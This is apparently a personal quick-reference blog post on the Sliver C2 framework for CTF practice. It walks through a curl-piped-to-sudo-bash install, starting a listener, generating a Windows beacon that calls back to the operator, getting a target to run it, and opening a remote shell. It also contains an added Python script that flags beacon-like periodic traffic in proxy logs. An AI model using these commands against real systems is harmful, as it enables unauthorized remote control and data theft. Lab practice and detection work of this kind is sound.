
Quick Reference Guide: Bishop Fox’s Sliver C2

Introduction

I’m looking to incorporate more and different tools into my weekly Hack the Box/Proving Grounds practice runs. Recently, I was re-introduced to the Bishop Fox C2 project, called Sliver, for the first time in a while, and I’ve really enjoyed getting to know it a little. I’m aiming to use this page as a bit of a quick reference guide for myself and hope to edit it as I discover more useful tricks.

NOTE: this is intended for my use in CTFs/practicing, and is not production or otherwise professionally put together.

Related informative sources

https://notateamserver.xyz/sliver-101/

https://heartburn.dev/hack-the-box-walkthrough-anubis-using-sliverc2/

Installation

In Kali, it really was just as simple as running their one-liner:

curl https://sliver.sh/install|sudo bash

Startup

└─$ sliver
Connecting to localhost:31337 ...

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
                                                                                                                                                                
All hackers gain evolve
[*] Server v1.5.30 - a8a36dd6e2c9796c51ab6983b5b615d19c6a6995
[*] Welcome to the sliver shell, please type 'help' for options

Install the armory

This will install all the third-party post-exploitation scripts.

sliver > armory install all

Start a listener

sliver > https --lhost local-ip-address -D

Generate beacons

This creates an executable that can be launched on the platform of choice.

sliver > generate beacon --http http://local-ip-address --os windows --save local-path-for-executable

Execute beacons

Get the executable file you just created, get it to your target user or host and execute it (or get someone to execute it for you) – you’ll see a call back and a beacon entry show up in the beacons list.

List beacons

sliver > beacons

 ID         Name               Transport   Username   Operating System   Last Check-In   Next Check-In 
========== ================== =========== ========== ================== =============== ===============
 d97fcc0b   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        1h12m2s         1h10m47s      
 7fae33ed   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        43m42s          42m19s        
 d2355aee   UGLIEST_FAMILIAR   http(s)     op2user    linux/amd64        29m59s          28m50s        
 aedc2bbd   UGLIEST_FAMILIAR   http(s)     op3user    linux/amd64        29m44s          28m34s        
 6f3596af   UGLIEST_FAMILIAR   http(s)     root       linux/amd64        38s             36s
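
From the defender's side, the Last Check-In / Next Check-In columns above reflect each beacon polling its C2 endpoint on a timer, which shows up in web-proxy logs as evenly spaced requests from one host to one destination. The following is an added example, not part of the original post or the Sliver project: it flags such flows by the coefficient of variation of their request intervals. The log format, addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log: timestamp, client IP, destination, path (all values made up).
SAMPLE_LOG = """\
2022-10-18T23:50:00 10.0.0.5 203.0.113.10 /index.php
2022-10-18T23:50:01 10.0.0.7 198.51.100.20 /news
2022-10-18T23:50:03 10.0.0.7 198.51.100.20 /style.css
2022-10-18T23:50:04 10.0.0.7 198.51.100.20 /logo.png
2022-10-18T23:51:02 10.0.0.5 203.0.113.10 /index.php
2022-10-18T23:51:30 10.0.0.8 198.51.100.30 /update
2022-10-18T23:51:58 10.0.0.5 203.0.113.10 /index.php
2022-10-18T23:52:40 10.0.0.7 198.51.100.20 /sports
2022-10-18T23:52:41 10.0.0.7 198.51.100.20 /ad.js
2022-10-18T23:53:01 10.0.0.5 203.0.113.10 /index.php
2022-10-18T23:54:00 10.0.0.5 203.0.113.10 /index.php
2022-10-18T23:55:03 10.0.0.5 203.0.113.10 /index.php
2022-10-18T23:56:10 10.0.0.8 198.51.100.30 /update
2022-10-18T23:58:10 10.0.0.7 198.51.100.20 /weather
"""

def find_periodic_flows(log_text, min_requests=5, max_cv=0.25):
    """Flag (client, dest) pairs with steady request spacing; jitter raises cv, so tune max_cv."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # blank or malformed line
        try:
            times[(parts[1], parts[2])].append(datetime.fromisoformat(parts[0]))
        except ValueError:
            continue  # unparseable timestamp
    findings = []
    for flow, stamps in times.items():
        if len(stamps) < min_requests:
            continue  # too few samples to judge periodicity
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(deltas)
        cv = pstdev(deltas) / avg if avg > 0 else float("inf")
        if cv <= max_cv:  # low spread relative to the mean = timer-like traffic
            findings.append({"client": flow[0], "dest": flow[1], "requests": len(stamps),
                             "mean_interval_s": round(avg, 1), "cv": round(cv, 3)})
    return findings

if __name__ == "__main__":
    for finding in find_periodic_flows(SAMPLE_LOG):
        print(finding)
```

Legitimate software (update checks, telemetry) also polls on a timer, so treat a hit as a lead to correlate with destination reputation and process data, not as a verdict.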

Use beacons

In order to set the current context to a particular beacon, I use the generated ID from the listing above. The prompt will change to contain the name of the selected beacon once it’s set as your active one. You can now issue commands.

sliver > use 6f3596af

[*] Active beacon UGLIEST_FAMILIAR (6f3596af-187d-4b0c-b264-d7482fc6d80b)

sliver (UGLIEST_FAMILIAR) >

Show task list

You can see the status of currently queued and completed tasks issued to a beacon as below:

sliver (UGLIEST_FAMILIAR) > tasks

 ID         State       Message Type   Created                         Sent                            Completed                     
========== =========== ============== =============================== =============================== ===============================
 49ead4a9   completed   Ls             Tue, 18 Oct 2022 23:58:08 EDT   Tue, 18 Oct 2022 23:58:52 EDT   Tue, 18 Oct 2022 23:58:52 EDT

Recall task output

You can re-review the output for a task and get more information about it using fetch and the task’s ID number.

sliver (UGLIEST_FAMILIAR) > tasks fetch 49ead4a9

+------------------------------------------------------+
| Beacon Task   | 49ead4a9-5859-465f-90e1-1c18ffbcdbdc |
+---------------+--------------------------------------+
| State         | ✅ Completed                         |
| Description   | LsReq                                |
| Created       | Tue, 18 Oct 2022 23:58:08 EDT        |
| Sent          | Tue, 18 Oct 2022 23:58:52 EDT        |
| Completed     | Tue, 18 Oct 2022 23:58:52 EDT        |
| Request Size  | 18 B                                 |
| Response Size | 639 B                                |
+------------------------------------------------------+

/tmp (3 items, 16.1 MiB)
=========================
dtrwxrwxrwx  .font-unix                                                                         <dir>      Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx  .ICE-unix                                                                          <dir>      Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx  .Test-unix                                                                         <dir>      Thu Sep 01 15:33:00 -0400 2022

Upload/download a file using beacons

sliver (UGLIEST_FAMILIAR) > upload /path/to/local/file /path/to/remote/destination
[*] Wrote file to /tmp/xxxx.sh

sliver (UGLIEST_FAMILIAR) > download /path/to/remote/source /path/to/local/destination/
[*] Wrote file to /tmp/xxxx.sh

Prepare interactive session

sliver (UGLIEST_FAMILIAR) > interactive

[*] Using beacon's active C2 endpoint: http://x.x.x.x
[*] Tasked beacon UGLIEST_FAMILIAR (5e13a94a)
[*] Session 13b20a10 UGLIEST_FAMILIAR - x.x.x.x:48738 (op1user) - linux/amd64 - Wed, 19 Oct 2022 00:10:05 EDT

List interactive sessions

sliver (UGLIEST_FAMILIAR) > sessions

 ID         Transport   Remote Address         Hostname   Username   Operating System   Health  
========== =========== ====================== ========== ========== ================== =========
 13b20a10   http(s)     x.x.x.x:48738          op1        op1user    linux/amd64        [ALIVE]

Switch to interactive sessions

Using the session ID from above, we will use sessions -i, familiar from meterpreter/metasploit. The prompt will change color to red once this is complete.

sliver (UGLIEST_FAMILIAR) > sessions -i 13b20a10

[*] Active session UGLIEST_FAMILIAR (13b20a10)

sliver (UGLIEST_FAMILIAR) >

Switch to full shell

Once in an interactive session, you can drop to a full-purpose shell.

sliver (UGLIEST_FAMILIAR) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 29576

op1user@op1:/tmp#